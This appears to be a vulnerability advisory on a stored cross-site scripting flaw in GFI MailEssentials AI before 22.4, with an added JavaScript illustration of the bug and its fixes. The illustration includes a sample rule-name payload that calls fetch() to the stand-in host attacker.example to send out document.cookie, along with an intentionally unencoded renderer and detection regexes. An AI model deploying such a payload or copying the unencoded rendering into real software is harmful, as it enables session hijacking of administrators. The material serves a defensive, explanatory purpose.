Impact
In GFI MailEssentials AI versions before 22.4, a stored cross‑site scripting flaw exists in the attachment filtering rule creation workflow. An attacker authenticated to the management interface can supply arbitrary HTML or JavaScript in the rule name field; the value is stored without validation and later rendered into the rule editing view without output encoding. Whenever any logged‑in user views or edits the malicious rule, the injected script executes in that user's browser with that user's privileges, enabling session hijacking, data theft or further client‑side attacks against the management console. The root cause is missing input validation combined with missing output encoding at the point where the rule name is written into the page.
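The following is an added illustration, not code from GFI MailEssentials or from the advisory: it models the vulnerable pattern described above (a stored rule name concatenated straight into the rule editing view) next to the two controls that close it, output encoding at the render boundary and an allow‑list check at rule creation, plus a small audit helper for rule names already in storage. The payload, rule records, function names and the allow‑list pattern are all constructed assumptions.

```javascript
// Added example (not GFI code). Shows why an unencoded rule name becomes stored
// XSS when rendered into the rule editing view, and how to fix it.

// Constructed payload an authenticated attacker might save as a rule name.
const MALICIOUS_RULE_NAME =
  'Block EXE files<script>fetch("https://attacker.example/c?" + document.cookie)</script>';

// Vulnerable rendering: the stored name is dropped into the markup verbatim,
// so any tags it contains become part of the DOM and execute for the viewer.
function renderRuleRowUnsafe(ruleName) {
  return `<tr><td class="rule-name">${ruleName}</td></tr>`;
}

// HTML encoder for text and attribute contexts (same effect as a server-side
// HtmlEncode call). '&' must be handled first so later entities are not doubled.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened rendering: encode at the output boundary. The browser now displays
// the literal text "<script>" instead of executing it.
function renderRuleRowSafe(ruleName) {
  return `<tr><td class="rule-name">${escapeHtml(ruleName)}</td></tr>`;
}

// Defence in depth at creation time: a rule name only needs a small character
// set, so reject anything outside it. Hypothetical allow-list, not a GFI rule.
const RULE_NAME_PATTERN = /^[A-Za-z0-9 _.()-]{1,64}$/;
function validateRuleName(ruleName) {
  return RULE_NAME_PATTERN.test(ruleName);
}

// Audit helper for existing data: flag stored names that already carry markup,
// a javascript: URL, or an inline event handler. Returns the offending rule ids.
function findSuspiciousRuleNames(rules) {
  const markup = /<[a-z!\/?]/i;
  const jsUrl = /javascript:/i;
  const handler = /on\w+\s*=/i;
  return rules
    .filter((r) => markup.test(r.name) || jsUrl.test(r.name) || handler.test(r.name))
    .map((r) => r.id);
}

// Constructed sample of what a rule table might hold after an attacker has
// saved one malicious rule.
const SAMPLE_RULES = [
  { id: 1, name: "Block executables" },
  { id: 2, name: MALICIOUS_RULE_NAME },
  { id: 3, name: "Quarantine archives (zip)" },
];

function demo() {
  console.log("unsafe :", renderRuleRowUnsafe(MALICIOUS_RULE_NAME));
  console.log("safe   :", renderRuleRowSafe(MALICIOUS_RULE_NAME));
  console.log("valid? :", validateRuleName(MALICIOUS_RULE_NAME));
  console.log("flagged:", findSuspiciousRuleNames(SAMPLE_RULES));
}

if (typeof require !== "undefined" && require.main === module) {
  demo();
}
```

Output encoding is the fix that actually removes the vulnerability; the allow‑list and the audit scan are complementary. A validation pattern alone is brittle (the same stored value may later be rendered in a context the pattern did not anticipate), and the audit helper is only useful for finding payloads planted before the patch was applied.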
Affected Systems
The flaw affects all installations of GFI MailEssentials AI released prior to version 22.4. The vulnerable code path is the attachment checking page at /MailEssentials/pages/MailSecurity/attachmentchecking.aspx. Every product variant that exposes this page is susceptible, regardless of deployment size or configuration.
Risk and Exploitability
The CVSS base score is 5.1, indicating medium severity. EPSS is reported as less than 1 %, indicating a very low probability of exploitation in the wild at present, and the vulnerability is not listed in the CISA KEV catalog. Exploitation requires legitimate credentials to the management console; an attacker who can create an attachment filtering rule can embed a payload that fires when any other user opens that rule. Because the attack is authenticated and the payload executes only in the browser of a user who views the affected rule, the exposed population is the set of management‑console users, which in practice means administrators. A compromised administrative session can still expose confidential data, alter filtering configuration, or be used to inject further malicious content, so the low EPSS should not be read as the flaw being harmless; it reflects low observed exploitation, not low impact once an account is obtained.
OpenCVE Enrichment